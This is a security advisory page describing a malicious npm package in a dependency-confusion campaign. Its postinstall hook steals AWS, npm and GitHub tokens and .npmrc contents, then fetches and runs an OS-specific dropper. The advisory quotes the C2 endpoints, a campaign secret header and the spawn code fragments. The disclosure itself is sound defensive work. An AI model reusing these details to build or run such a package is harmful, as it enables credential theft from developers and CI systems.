VDB

GCVE-110-OSM-2026-4741

GCVE-110-OSM-2026-4741
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published May 26, 2026
Exfiltrates AWS credentials, npm tokens, GitHub tokens, and .npmrc file contents to attacker-controlled C2 at oob.moika.tech, then downloads and executes an OS-specific dropper at postinstall time. Part of the confirmed bcs-bank dependency confusion campaign: the postinstall hook harvests all sensitive environment variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, NPM_TOKEN, GITHUB_TOKEN, and 7 others) and .npmrc files from four filesystem locations, posts them as JSON to https://oob.moika.tech/report with campaign secret X-Secret: l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1, then fetches and executes an OS-specific dropper from https://oob.moika.tech/payload/{mac|win|linux} as a detached background process. **Trigger** (`postinstall`): executes `node scripts/postinstall.js` at install time. **Credential collection**: iterates all `process.env` entries for keys matching `npm_token`, `npm_config_authtoken`, `npm_config__auth`, `github_token`, `aws_access_key_id`, `aws_secret_access_key`, `aws_session_token`, `artifactory_token`, `nexus_token`, `node_auth_token`. **File access**: reads first 15 lines of `.npmrc` from `~/.npmrc`, `/etc/npmrc`, `<cwd>/.npmrc`, and `<cwd>/../.npmrc`. **System fingerprint**: collects hostname, username, platform, arch, node version, npm version, cwd, default npm registry. **CI detection**: reads `process.env.GITHUB_ACTIONS`, `JENKINS_URL`, `GITLAB_CI`. **Exfiltration**: HTTP POST to `https://oob.moika.tech/report` with `X-Secret: l95HdDaz3kQx1Zsg3WxH6HvKANf51RY1` header containing all collected data as JSON. **Payload delivery**: `httpGet('https://oob.moika.tech/payload/{mac|win|linux}')` → writes to temp file → `spawn('/bin/sh', [tmp], { detached: true, stdio: 'ignore' }).unref()` (Linux/macOS) or `spawn('cmd.exe', ['/c', tmp], { detached: true, windowsHide: true }).unref()` (Windows). Stage-2 payloads confirmed for campaign siblings: macOS = `._kworker` + `universald` (LaunchAgent persistence agent), Windows = `WinUpdate.exe` (Tauri RAT).

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@service-user-notifications/set_refresh_interval9.9.10 (affected)

Browse GCVE Records

73,442 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›